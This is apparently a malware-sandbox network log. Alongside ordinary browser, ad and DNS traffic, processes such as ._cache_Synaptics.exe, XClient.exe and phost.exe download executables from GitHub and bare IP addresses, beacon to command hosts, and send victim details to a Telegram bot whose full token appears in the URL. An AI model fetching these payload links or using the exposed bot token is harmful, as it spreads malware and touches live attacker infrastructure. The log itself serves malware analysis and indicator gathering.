HTTP Request

GET https://ei.phncdn.com/www-static/js/premium/premium-modals.js?cache=2025013001

HTTP Request

GET https://ei.phncdn.com/www-static/js/lib/generated/front-index-pc.js?cache=2025013001

HTTP Request

GET https://ei.phncdn.com/www-static/js/promo-banner.js?cache=2025013001

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200
64.210.156.21:443

ei.phncdn.com

tls

msedge.exe

1.1kB
4.4kB
10
8
64.210.156.21:443

ei.phncdn.com

tls

msedge.exe

1.1kB
4.4kB
10
8
64.210.156.21:443

ei.phncdn.com

tls

msedge.exe

1.1kB
4.4kB
10
8
64.210.156.21:443

ei.phncdn.com

tls

msedge.exe

1.1kB
4.4kB
10
8
64.210.156.21:443

ei.phncdn.com

tls

msedge.exe

1.1kB
4.4kB
10
8
64.210.156.23:443

https://pix-ht.trafficjunky.net/c3721/uploaded_content/creative/103/100/600/1/1031006001.gif/plain/q:85?validfrom=1737796881&validto=1739006481&hash=UOi59j%2FwAppldCmlJs1lJRf5Vuo%3D

tls, http2

msedge.exe

3.2kB
84.6kB
42
69

HTTP Request

GET https://media.trafficjunky.net/delivery/js/abp/js1.js

HTTP Response

200

HTTP Request

GET https://pix-ht.trafficjunky.net/c3721/uploaded_content/creative/103/100/600/1/1031006001.gif/plain/q:85?validfrom=1737796881&validto=1739006481&hash=UOi59j%2FwAppldCmlJs1lJRf5Vuo%3D

HTTP Response

200
66.254.114.156:443

https://cdn1-smallimg.phncdn.com/n172nWs1UEcnquuObA5x52osw51230gH/rta-1.gif

tls, http2

msedge.exe

1.7kB
5.9kB
13
10

HTTP Request

GET https://cdn1-smallimg.phncdn.com/n172nWs1UEcnquuObA5x52osw51230gH/rta-1.gif

HTTP Response

200
64.210.156.21:443

https://ei.phncdn.com/www-static/fonts/ph-icons/ph-icons.woff2?cache=2025013001

tls, http2

msedge.exe

2.6kB
37.6kB
31
35

HTTP Request

GET https://ei.phncdn.com/www-static/fonts/ph-icons/ph-icons.woff2?cache=2025013001

HTTP Response

200
66.254.114.171:443

https://a.adtng.com/get/10000098?&uuid=bf4367ea3fa14522a6a01981a2d48b0c&impid=bf4367ea3fa14522a6a01981a2d48b0c-1&tj_zid=5&tj_cid=1007935961&tj_aid=2071998101&infos=CiQwYWY2ZWY2NC1lNTBhLTQ1NjgtYmFiZi00ODU2ZWM4MzgyZDAQkc/3vAYaImJmNDM2N2VhM2ZhMTQ1MjJhNmEwMTk4MWEyZDQ4YjBjLTEgAjAFOAVAtZEXSNnDz+ADUgEyWNXrqd4DYIe7tYMEciAzNThkNTRlMjU5OTk0YTBjOWE3MWRjMjE2MjJlOGNjOYEB8WjjiLX45D6SAQJHQpoBA0VOR6IBBkxvbmRvbsoBFWNvZ2VudCBjb21tdW5pY2F0aW9uc9IBBHdpZmnaAQd3aW5kb3dz4gEOMTgxLjIxNS4xNzYuODP6AQ4xODEuMjE1LjE3Ni44M4ICB2RlZDc2NTSSAgRlZGdlmgIERUMxTqoCBDEwLjCyAgQ5Mi4w2AKV3YDcB+AC6dCynwT6AgExggNfeyJhY3Rvcl9pZCI6bnVsbCwiY29udGVudF90eXBlIjpudWxsLCJ2aWRlb19pZCI6bnVsbCwiaGFzaCI6ImJiMGNjMGJiNTQ5ODZkODJmMWM1NzgzYThiNDc5MDc5In2SAwdkZXNrdG9wmgMCZW6oAwHCAwRob21lmAQB2AQj&noc=1

tls, http2

msedge.exe

3.6kB
16.0kB
20
20

HTTP Request

GET https://a.adtng.com/get/10000098?&uuid=bf4367ea3fa14522a6a01981a2d48b0c&impid=bf4367ea3fa14522a6a01981a2d48b0c-1&tj_zid=5&tj_cid=1007935961&tj_aid=2071998101&infos=CiQwYWY2ZWY2NC1lNTBhLTQ1NjgtYmFiZi00ODU2ZWM4MzgyZDAQkc/3vAYaImJmNDM2N2VhM2ZhMTQ1MjJhNmEwMTk4MWEyZDQ4YjBjLTEgAjAFOAVAtZEXSNnDz+ADUgEyWNXrqd4DYIe7tYMEciAzNThkNTRlMjU5OTk0YTBjOWE3MWRjMjE2MjJlOGNjOYEB8WjjiLX45D6SAQJHQpoBA0VOR6IBBkxvbmRvbsoBFWNvZ2VudCBjb21tdW5pY2F0aW9uc9IBBHdpZmnaAQd3aW5kb3dz4gEOMTgxLjIxNS4xNzYuODP6AQ4xODEuMjE1LjE3Ni44M4ICB2RlZDc2NTSSAgRlZGdlmgIERUMxTqoCBDEwLjCyAgQ5Mi4w2AKV3YDcB+AC6dCynwT6AgExggNfeyJhY3Rvcl9pZCI6bnVsbCwiY29udGVudF90eXBlIjpudWxsLCJ2aWRlb19pZCI6bnVsbCwiaGFzaCI6ImJiMGNjMGJiNTQ5ODZkODJmMWM1NzgzYThiNDc5MDc5In2SAwdkZXNrdG9wmgMCZW6oAwHCAwRob21lmAQB2AQj&noc=1

HTTP Response

200
216.239.34.36:443

https://region1.google-analytics.com/g/collect?v=2&tid=G-B39RFFWGYY&gtm=45je51u0v889308053z8892446692za200zb892446692&_p=1738401681297&gcs=G100&gcd=13p3p3l3l5l1&npa=0&dma=0&tag_exp=102067808~102081485~102123608~102482432~102528644~102539968~102546754&cid=1380070532.1738401682&ul=en-us&sr=1280x720&uaa=x86&uamb=0&uam=&uap=Windows&uapv=10.0&uaw=0&frm=0&pscdl=denied&_s=1&sid=1738401682&sct=1&seg=0&dl=https%3A%2F%2Fwww.pornhub.com%2F&dt=Free%20Porn%20Videos%20%26%20Sex%20Movies%20-%20Porno%2C%20XXX%2C%20Porn%20Tube%20%7C%20Pornhub&en=page_view&_fv=1&_nsi=1&_ss=1&ep.login_user=No&ep.user_interface=pc&ep.content_group=homepage&ep.content_group_2=homepage&ep.shorties_orientation=straight&ep.referrer_group=external&ep.seo_tags_translation=0&ep.watch_page_exp_value=B&ep.dd_homepage_restructure=ineligible&up.login_user=No&up.user_interface=pc&up.signup_experiment_value=all&up.orientation=straight&up.shorties_experiment_version=phase_1&up.shorties_exp_2=B&up.shorties_orientation=straight&up.isp=Cogent%20Communications&up.connection_type=Corporate&up.seo_tags_translation_user=0&tfd=1812

tls, http2

msedge.exe

2.5kB
7.1kB
14
13

HTTP Request

POST https://region1.google-analytics.com/g/collect?v=2&tid=G-B39RFFWGYY&gtm=45je51u0v889308053z8892446692za200zb892446692&_p=1738401681297&gcs=G100&gcd=13p3p3l3l5l1&npa=0&dma=0&tag_exp=102067808~102081485~102123608~102482432~102528644~102539968~102546754&cid=1380070532.1738401682&ul=en-us&sr=1280x720&uaa=x86&uamb=0&uam=&uap=Windows&uapv=10.0&uaw=0&frm=0&pscdl=denied&_s=1&sid=1738401682&sct=1&seg=0&dl=https%3A%2F%2Fwww.pornhub.com%2F&dt=Free%20Porn%20Videos%20%26%20Sex%20Movies%20-%20Porno%2C%20XXX%2C%20Porn%20Tube%20%7C%20Pornhub&en=page_view&_fv=1&_nsi=1&_ss=1&ep.login_user=No&ep.user_interface=pc&ep.content_group=homepage&ep.content_group_2=homepage&ep.shorties_orientation=straight&ep.referrer_group=external&ep.seo_tags_translation=0&ep.watch_page_exp_value=B&ep.dd_homepage_restructure=ineligible&up.login_user=No&up.user_interface=pc&up.signup_experiment_value=all&up.orientation=straight&up.shorties_experiment_version=phase_1&up.shorties_exp_2=B&up.shorties_orientation=straight&up.isp=Cogent%20Communications&up.connection_type=Corporate&up.seo_tags_translation_user=0&tfd=1812
64.210.156.17:443

https://ht-cdn2.adtng.com/a7/creatives/221/1559/819920/1112280/1112280_video.mp4

tls, http2

msedge.exe

20.6kB
877.3kB
339
642

HTTP Request

GET https://ht-cdn2.adtng.com/delivery/vortex/vortex-simple-1.0.0.js

HTTP Request

GET https://ht-cdn2.adtng.com/a7/creatives/221/1559/819920/1112280/1112280_logo.png

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://ht-cdn2.adtng.com/a7/creatives/221/1559/819920/1112280/1112280_video.mp4

HTTP Response

206
64.210.156.17:443

ht-cdn2.adtng.com

tls

msedge.exe

4.7kB
3.9kB
11
7
151.101.195.52:443

https://hw-cdn2.adtng.com/delivery/intersection_observer/IntersectionObserver.js

tls, http2

msedge.exe

2.9kB
22.9kB
19
26

HTTP Request

GET https://hw-cdn2.adtng.com/delivery/intersection_observer/IntersectionObserver.js

HTTP Response

200
216.58.213.27:443

https://storage.googleapis.com/workbox-cdn/releases/5.1.3/workbox-sw.js

tls, http2

msedge.exe

1.6kB
7.1kB
13
11

HTTP Request

GET https://storage.googleapis.com/workbox-cdn/releases/5.1.3/workbox-sw.js
193.58.121.250:7175

NVIDIA.exe

260 B
200 B
5
5
193.58.121.250:7175

NVIDIA.exe

260 B
200 B
5
5
20.26.156.215:80

http://github.com/Abdulah345/pizdaporc/raw/refs/heads/main/XClient.exe

http

._cache_Synaptics.exe

388 B
308 B
6
4

HTTP Request

GET http://github.com/Abdulah345/pizdaporc/raw/refs/heads/main/XClient.exe

HTTP Response

301
20.26.156.215:443

https://github.com/homboz/ph1/releases/download/po1/phost.exe

tls, http

._cache_Synaptics.exe

1.1kB
12.5kB
13
16

HTTP Request

GET https://github.com/Abdulah345/pizdaporc/raw/refs/heads/main/XClient.exe

HTTP Response

302

HTTP Request

GET https://github.com/homboz/ph1/releases/download/po1/phost.exe

HTTP Response

302
185.199.109.133:443

https://raw.githubusercontent.com/yuriksq/papilla/refs/heads/main/jrockekcurje.exe

tls, http

._cache_Synaptics.exe

6.7kB
352.8kB
133
260

HTTP Request

GET https://raw.githubusercontent.com/Abdulah345/pizdaporc/refs/heads/main/XClient.exe

HTTP Response

200

HTTP Request

GET https://raw.githubusercontent.com/yuriksq/papilla/refs/heads/main/jrockekcurje.exe

HTTP Response

200
185.199.108.133:443

https://objects.githubusercontent.com/github-production-release-asset-2e65be/900477894/166efba7-6d8f-45e7-9bad-9047bb8b57b9?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250201%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250201T092139Z&X-Amz-Expires=300&X-Amz-Signature=2d083d77c8e010aa7e93c8e673be0bd85b7d1bab8cdb64173c5158fa62577720&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dphost.exe&response-content-type=application%2Foctet-stream

tls, http

._cache_Synaptics.exe

143.7kB
8.1MB
3028
5798

HTTP Request

GET https://objects.githubusercontent.com/github-production-release-asset-2e65be/900477894/166efba7-6d8f-45e7-9bad-9047bb8b57b9?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250201%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250201T092139Z&X-Amz-Expires=300&X-Amz-Signature=2d083d77c8e010aa7e93c8e673be0bd85b7d1bab8cdb64173c5158fa62577720&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dphost.exe&response-content-type=application%2Foctet-stream

HTTP Response

200
193.58.121.250:7175

NVIDIA.exe

260 B
200 B
5
5
185.215.113.209:80

._cache_Synaptics.exe

260 B
5
83.175.202.178:80

http://soportegira.net/descargas/Ammyy.exe

http

._cache_Synaptics.exe

13.5kB
789.2kB
291
574

HTTP Request

GET http://soportegira.net/descargas/Ammyy.exe

HTTP Response

200
151.101.128.223:443

https://www.python.org/ftp/python/3.10.0/python-3.10.0rc2-amd64.exe

tls, http

curl.exe

495.6kB
29.2MB
10686
20925

HTTP Request

GET https://www.python.org/ftp/python/3.10.0/python-3.10.0rc2-amd64.exe

HTTP Response

200
47.113.74.51:80

zlonline.oss-cn-shenzhen.aliyuncs.com

._cache_Synaptics.exe

260 B
5
188.42.129.148:80

http://rl.ammyy.com/

http

Ammyy.exe

824 B
446 B
11
4

HTTP Request

POST http://rl.ammyy.com/

HTTP Response

200
136.243.104.235:443

https

Ammyy.exe

410 B
258 B
8
6
208.95.112.1:80

http://ip-api.com/line/?fields=hosting

http

XClient.exe

310 B
347 B
5
4

HTTP Request

GET http://ip-api.com/line/?fields=hosting

HTTP Response

200
208.95.112.1:80

http://ip-api.com/line/?fields=hosting

http

phost.exe

347 B
307 B
5
3

HTTP Request

GET http://ip-api.com/line/?fields=hosting

HTTP Response

200
172.217.16.227:443

gstatic.com

tls

phost.exe

1.1kB
5.3kB
9
9
193.58.121.250:7175

NVIDIA.exe

260 B
200 B
5
5
149.154.167.220:443

https://api.telegram.org/bot7269786725:AAF0IPx1BWTdW_vbZqP8HGNrxWWFpF5CvYs/sendMessage?chat_id=5465523859&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A84C2674B4D3C1D768A91%0D%0A%0D%0AUserName%20:%20Admin%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Intel%20Core%20Processor%20(Broadwell)%0D%0AGPU%20:%20Microsoft%20Basic%20Display%20Adapter%20%0D%0ARAM%20:%20Error%0D%0AGroub%20:%20XWorm%20V5.2

tls, http

XClient.exe

1.3kB
7.2kB
11
12

HTTP Request

GET https://api.telegram.org/bot7269786725:AAF0IPx1BWTdW_vbZqP8HGNrxWWFpF5CvYs/sendMessage?chat_id=5465523859&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A84C2674B4D3C1D768A91%0D%0A%0D%0AUserName%20:%20Admin%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Intel%20Core%20Processor%20(Broadwell)%0D%0AGPU%20:%20Microsoft%20Basic%20Display%20Adapter%20%0D%0ARAM%20:%20Error%0D%0AGroub%20:%20XWorm%20V5.2

HTTP Response

200
208.95.112.1:80

http://ip-api.com/json/?fields=225545

http

phost.exe

392 B
472 B
6
3

HTTP Request

GET http://ip-api.com/json/?fields=225545

HTTP Response

200
193.58.121.250:7175

NVIDIA.exe

260 B
200 B
5
5
162.159.128.233:443

discord.com

tls

phost.exe

11.6MB
113.1kB
8375
2658
147.185.221.23:42627

event-dollar.gl.at.ply.gg

XClient.exe

260 B
5
172.67.75.40:443

https://rentry.co/sntwm349/raw

tls, http

curl.exe

943 B
10.4kB
12
16

HTTP Request

GET https://rentry.co/sntwm349/raw

HTTP Response

200
185.215.113.209:80

._cache_Synaptics.exe

260 B
5
193.58.121.250:7175

NVIDIA.exe

260 B
200 B
5
5
185.215.113.209:80

._cache_Synaptics.exe

260 B
5
193.58.121.250:7175

NVIDIA.exe

260 B
200 B
5
5
142.250.200.14:443

https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

tls, http

Synaptics.exe

1.9kB
11.3kB
16
14

HTTP Request

GET https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

HTTP Response

303

HTTP Request

GET https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

HTTP Response

303

HTTP Request

GET https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

HTTP Response

303
193.58.121.250:7175

NVIDIA.exe

260 B
200 B
5
5
216.58.212.227:80

http://c.pki.goog/r/r1.crl

http

Synaptics.exe

303 B
1.7kB
4
4

HTTP Request

GET http://c.pki.goog/r/r1.crl

HTTP Response

200
216.58.212.227:80

http://o.pki.goog/wr2/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACECMZhqL6oO7XCZBnn%2Fi9HYU%3D

http

Synaptics.exe

742 B
1.6kB
6
4

HTTP Request

GET http://o.pki.goog/wr2/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEENj6GAUNBVpEvo20UE38mc%3D

HTTP Response

200

HTTP Request

GET http://o.pki.goog/wr2/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACECMZhqL6oO7XCZBnn%2Fi9HYU%3D

HTTP Response

200
172.217.16.225:443

https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

tls, http

Synaptics.exe

2.4kB
14.7kB
23
21

HTTP Request

GET https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

HTTP Response

404

HTTP Request

GET https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

HTTP Response

404

HTTP Request

GET https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

HTTP Response

404
20.26.156.215:80

http://github.com/yuriksq/papilla/raw/refs/heads/main/jrockekcurje.exe

http

._cache_Synaptics.exe

318 B
268 B
5
3

HTTP Request

GET http://github.com/yuriksq/papilla/raw/refs/heads/main/jrockekcurje.exe

HTTP Response

301
20.26.156.215:443

https://github.com/yuriksq/papilla/raw/refs/heads/main/jrockekcurje.exe

tls, http

._cache_Synaptics.exe

784 B
7.9kB
9
11

HTTP Request

GET https://github.com/yuriksq/papilla/raw/refs/heads/main/jrockekcurje.exe

HTTP Response

302
185.215.113.209:80

._cache_Synaptics.exe

260 B
5
208.95.112.1:80

http://ip-api.com/json/

http

jrockekcurje.exe

374 B
600 B
5
3

HTTP Request

GET http://ip-api.com/json/

HTTP Response

200
2.59.163.172:80

http://2.59.163.172/svc.exe

http

._cache_Synaptics.exe

4.7kB
267.2kB
100
195

HTTP Request

GET http://2.59.163.172/svc.exe

HTTP Response

200
45.136.51.217:5173

jrockekcurje.exe

260 B
200 B
5
5
193.58.121.250:7175

NVIDIA.exe

260 B
200 B
5
5
172.67.203.125:2096

https://getsolara.dev:2096/download/static/files/BootstrapperNew.exe

tls, http

._cache_Synaptics.exe

120.4kB
3.1MB
1871
2240

HTTP Request

GET https://getsolara.dev:2096/download/static/files/BootstrapperNew.exe

HTTP Response

200
36.138.125.70:8089

._cache_Synaptics.exe

260 B
5
147.185.221.23:42627

event-dollar.gl.at.ply.gg

XClient.exe

260 B
5
45.136.51.217:5173

jrockekcurje.exe

260 B
200 B
5
5
193.58.121.250:7175

NVIDIA.exe

260 B
200 B
5
5
45.136.51.217:5173

jrockekcurje.exe

260 B
200 B
5
5
193.58.121.250:7175

NVIDIA.exe

260 B
200 B
5
5
45.136.51.217:5173

jrockekcurje.exe

260 B
200 B
5
5
89.197.154.116:80

http://89.197.154.116/Rar.exe

http

._cache_Synaptics.exe

14.5kB
602.6kB
295
435

HTTP Request

GET http://89.197.154.116/Rar.exe

HTTP Response

200
139.196.217.38:80

tengfeidn.com

._cache_Synaptics.exe

260 B
5
193.58.121.250:7175

NVIDIA.exe

260 B
200 B
5
5
185.215.113.16:80

._cache_Synaptics.exe

260 B
5
45.136.51.217:5173

jrockekcurje.exe

260 B
200 B
5
5
147.185.221.23:42627

event-dollar.gl.at.ply.gg

XClient.exe

260 B
5
193.58.121.250:7175

NVIDIA.exe

260 B
200 B
5
5
45.136.51.217:5173

jrockekcurje.exe

260 B
200 B
5
5
193.58.121.250:7175

NVIDIA.exe

260 B
200 B
5
5
45.136.51.217:5173

jrockekcurje.exe

260 B
200 B
5
5
47.104.173.216:9876

._cache_Synaptics.exe

260 B
5
45.136.51.217:5173

jrockekcurje.exe

260 B
200 B
5
5
185.215.113.66:80

rddissisifigifidi.net

._cache_Synaptics.exe

260 B
5
193.58.121.250:7175

NVIDIA.exe

260 B
200 B
5
5
45.136.51.217:5173

jrockekcurje.exe

260 B
200 B
5
5
193.58.121.250:7175

NVIDIA.exe

260 B
200 B
5
5
147.185.221.23:42627

event-dollar.gl.at.ply.gg

XClient.exe

260 B
5
45.136.51.217:5173

jrockekcurje.exe

260 B
200 B
5
5
193.58.121.250:7175

NVIDIA.exe

260 B
200 B
5
5
45.136.51.217:5173

jrockekcurje.exe

260 B
200 B
5
5
42.240.133.45:8800

._cache_Synaptics.exe

260 B
5
103.110.33.188:80

http://103.110.33.188/autoupdate/hostfile/Autoupdate.exe

http

._cache_Synaptics.exe

33.1kB
2.0MB
717
1425

HTTP Request

GET http://103.110.33.188/autoupdate/hostfile/Autoupdate.exe

HTTP Response

200
193.58.121.250:7175

NVIDIA.exe

260 B
200 B
5
5
45.136.51.217:5173

jrockekcurje.exe

260 B
200 B
5
5
185.215.113.209:80

._cache_Synaptics.exe

208 B
4
103.110.33.188:80

http://103.110.33.188/autoupdate/hostfile/Autoupdate.exe

http

Autoupdate.exe

59.1kB
3.0MB
1239
2131

HTTP Request

GET http://103.110.33.188/autoupdate/hostfile/version.xml

HTTP Response

200

HTTP Request

GET http://103.110.33.188/autoupdate/hostfile/Autoupdate.exe

HTTP Response

200
193.58.121.250:7175

NVIDIA.exe

260 B
200 B
5
5
45.136.51.217:5173

jrockekcurje.exe

260 B
200 B
5
5
103.110.33.188:80

Autoupdate.exe

8.8.8.8:53

urlhaus.abuse.ch

dns

._cache_Synaptics.exe

62 B
167 B
1
1

DNS Request

urlhaus.abuse.ch

DNS Response

151.101.130.49

151.101.2.49

151.101.66.49

151.101.194.49
8.8.8.8:53

github.com

dns

._cache_Synaptics.exe

56 B
72 B
1
1

DNS Request

github.com

DNS Response

20.26.156.215
8.8.8.8:53

raw.githubusercontent.com

dns

._cache_Synaptics.exe

71 B
135 B
1
1

DNS Request

raw.githubusercontent.com

DNS Response

185.199.109.133

185.199.108.133

185.199.111.133

185.199.110.133
8.8.8.8:53

49.130.101.151.in-addr.arpa

dns

73 B
133 B
1
1

DNS Request

49.130.101.151.in-addr.arpa
8.8.8.8:53

215.156.26.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

215.156.26.20.in-addr.arpa
8.8.8.8:53

97.32.109.52.in-addr.arpa

dns

71 B
145 B
1
1

DNS Request

97.32.109.52.in-addr.arpa
8.8.8.8:53

g.bing.com

dns

56 B
148 B
1
1

DNS Request

g.bing.com

DNS Response

150.171.28.10

150.171.27.10
8.8.8.8:53

66.160.190.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

66.160.190.20.in-addr.arpa
8.8.8.8:53

46.242.123.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

46.242.123.52.in-addr.arpa
8.8.8.8:53

151.37.232.203.in-addr.arpa

dns

73 B
131 B
1
1

DNS Request

151.37.232.203.in-addr.arpa
8.8.8.8:53

133.109.199.185.in-addr.arpa

dns

74 B
118 B
1
1

DNS Request

133.109.199.185.in-addr.arpa
8.8.8.8:53

10.28.171.150.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

10.28.171.150.in-addr.arpa
8.8.8.8:53

xred.mooo.com

dns

Synaptics.exe

59 B
118 B
1
1

DNS Request

xred.mooo.com
8.8.8.8:53

freedns.afraid.org

dns

Synaptics.exe

64 B
80 B
1
1

DNS Request

freedns.afraid.org

DNS Response

69.42.215.252
224.0.0.251:5353

msedge.exe

961 B
15
8.8.8.8:53

252.215.42.69.in-addr.arpa

dns

144 B
144 B
2
2

DNS Request

252.215.42.69.in-addr.arpa

DNS Request

252.215.42.69.in-addr.arpa
8.8.8.8:53

www.pornhub.com

dns

msedge.exe

132 B
226 B
2
2

DNS Request

www.pornhub.com

DNS Response

66.254.114.41

DNS Request

166.190.18.2.in-addr.arpa
8.8.8.8:53

static.trafficjunky.com

dns

msedge.exe

69 B
246 B
1
1

DNS Request

static.trafficjunky.com

DNS Response

64.210.156.19

64.210.156.21

64.210.156.16

64.210.156.18

64.210.156.23

64.210.156.22

64.210.156.20

64.210.156.17
8.8.8.8:53

ei.phncdn.com

dns

msedge.exe

59 B
226 B
1
1

DNS Request

ei.phncdn.com

DNS Response

64.210.156.21

64.210.156.17

64.210.156.22

64.210.156.16

64.210.156.23

64.210.156.18

64.210.156.19

64.210.156.20
8.8.8.8:53

media.trafficjunky.net

dns

msedge.exe

68 B
247 B
1
1

DNS Request

media.trafficjunky.net

DNS Response

64.210.156.23

64.210.156.17

64.210.156.22

64.210.156.20

64.210.156.16

64.210.156.19

64.210.156.21

64.210.156.18
8.8.8.8:53

cdn1-smallimg.phncdn.com

dns

msedge.exe

70 B
109 B
1
1

DNS Request

cdn1-smallimg.phncdn.com

DNS Response

66.254.114.156
8.8.8.8:53

41.114.254.66.in-addr.arpa

dns

72 B
113 B
1
1

DNS Request

41.114.254.66.in-addr.arpa
8.8.8.8:53

19.156.210.64.in-addr.arpa

dns

72 B
129 B
1
1

DNS Request

19.156.210.64.in-addr.arpa
8.8.8.8:53

21.156.210.64.in-addr.arpa

dns

72 B
129 B
1
1

DNS Request

21.156.210.64.in-addr.arpa
8.8.8.8:53

23.156.210.64.in-addr.arpa

dns

72 B
129 B
1
1

DNS Request

23.156.210.64.in-addr.arpa
8.8.8.8:53

156.114.254.66.in-addr.arpa

dns

73 B
114 B
1
1

DNS Request

156.114.254.66.in-addr.arpa
8.8.8.8:53

200.187.250.142.in-addr.arpa

dns

74 B
112 B
1
1

DNS Request

200.187.250.142.in-addr.arpa
8.8.8.8:53

ss.phncdn.com

dns

msedge.exe

59 B
226 B
1
1

DNS Request

ss.phncdn.com

DNS Response

64.210.156.17

64.210.156.20

64.210.156.18

64.210.156.21

64.210.156.19

64.210.156.22

64.210.156.16

64.210.156.23
8.8.8.8:53

a.adtng.com

dns

msedge.exe

57 B
73 B
1
1

DNS Request

a.adtng.com

DNS Response

66.254.114.171
8.8.8.8:53

region1.google-analytics.com

dns

msedge.exe

74 B
106 B
1
1

DNS Request

region1.google-analytics.com

DNS Response

216.239.34.36

216.239.32.36
8.8.8.8:53

pix-ht.trafficjunky.net

dns

msedge.exe

69 B
249 B
1
1

DNS Request

pix-ht.trafficjunky.net

DNS Response

64.210.156.23

64.210.156.22

64.210.156.17

64.210.156.16

64.210.156.18

64.210.156.19

64.210.156.21

64.210.156.20
8.8.8.8:53

ht-cdn2.adtng.com

dns

msedge.exe

63 B
234 B
1
1

DNS Request

ht-cdn2.adtng.com

DNS Response

64.210.156.17

64.210.156.22

64.210.156.21

64.210.156.23

64.210.156.16

64.210.156.19

64.210.156.20

64.210.156.18
8.8.8.8:53

171.114.254.66.in-addr.arpa

dns

73 B
114 B
1
1

DNS Request

171.114.254.66.in-addr.arpa
8.8.8.8:53

hw-cdn2.adtng.com

dns

msedge.exe

63 B
164 B
1
1

DNS Request

hw-cdn2.adtng.com

DNS Response

151.101.195.52

151.101.131.52

151.101.3.52

151.101.67.52
8.8.8.8:53

storage.googleapis.com

dns

msedge.exe

68 B
292 B
1
1

DNS Request

storage.googleapis.com

DNS Response

216.58.213.27

216.58.201.123

142.250.187.219

172.217.16.251

172.217.169.27

216.58.204.91

172.217.169.59

142.250.178.27

216.58.212.219

142.250.187.251

142.250.179.251

142.250.200.27

142.250.180.27

142.250.200.59
8.8.8.8:53

36.34.239.216.in-addr.arpa

dns

72 B
132 B
1
1

DNS Request

36.34.239.216.in-addr.arpa
8.8.8.8:53

17.156.210.64.in-addr.arpa

dns

72 B
129 B
1
1

DNS Request

17.156.210.64.in-addr.arpa
8.8.8.8:53

52.195.101.151.in-addr.arpa

dns

73 B
133 B
1
1

DNS Request

52.195.101.151.in-addr.arpa
8.8.8.8:53

27.213.58.216.in-addr.arpa

dns

72 B
141 B
1
1

DNS Request

27.213.58.216.in-addr.arpa
216.239.34.36:443

region1.google-analytics.com

https

msedge.exe

2.8kB
7.2kB
7
10
8.8.8.8:53

26.173.189.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

26.173.189.20.in-addr.arpa
8.8.8.8:53

objects.githubusercontent.com

dns

._cache_Synaptics.exe

75 B
139 B
1
1

DNS Request

objects.githubusercontent.com

DNS Response

185.199.108.133

185.199.109.133

185.199.111.133

185.199.110.133
8.8.8.8:53

133.108.199.185.in-addr.arpa

dns

74 B
118 B
1
1

DNS Request

133.108.199.185.in-addr.arpa
8.8.8.8:53

soportegira.net

dns

._cache_Synaptics.exe

61 B
77 B
1
1

DNS Request

soportegira.net

DNS Response

83.175.202.178
8.8.8.8:53

www.python.org

dns

curl.exe

60 B
169 B
1
1

DNS Request

www.python.org

DNS Response

151.101.128.223

151.101.64.223

151.101.192.223

151.101.0.223
8.8.8.8:53

zlonline.oss-cn-shenzhen.aliyuncs.com

dns

._cache_Synaptics.exe

83 B
213 B
1
1

DNS Request

zlonline.oss-cn-shenzhen.aliyuncs.com

DNS Response

47.113.74.51
8.8.8.8:53

178.202.175.83.in-addr.arpa

dns

73 B
100 B
1
1

DNS Request

178.202.175.83.in-addr.arpa
8.8.8.8:53

223.128.101.151.in-addr.arpa

dns

74 B
134 B
1
1

DNS Request

223.128.101.151.in-addr.arpa
8.8.8.8:53

rl.ammyy.com

dns

Ammyy.exe

58 B
74 B
1
1

DNS Request

rl.ammyy.com

DNS Response

188.42.129.148
8.8.8.8:53

ip-api.com

dns

jrockekcurje.exe

56 B
72 B
1
1

DNS Request

ip-api.com

DNS Response

208.95.112.1
8.8.8.8:53

blank-dzt3h.in

dns

phost.exe

60 B
113 B
1
1

DNS Request

blank-dzt3h.in
8.8.8.8:53

148.129.42.188.in-addr.arpa

dns

73 B
146 B
1
1

DNS Request

148.129.42.188.in-addr.arpa
8.8.8.8:53

235.104.243.136.in-addr.arpa

dns

74 B
133 B
1
1

DNS Request

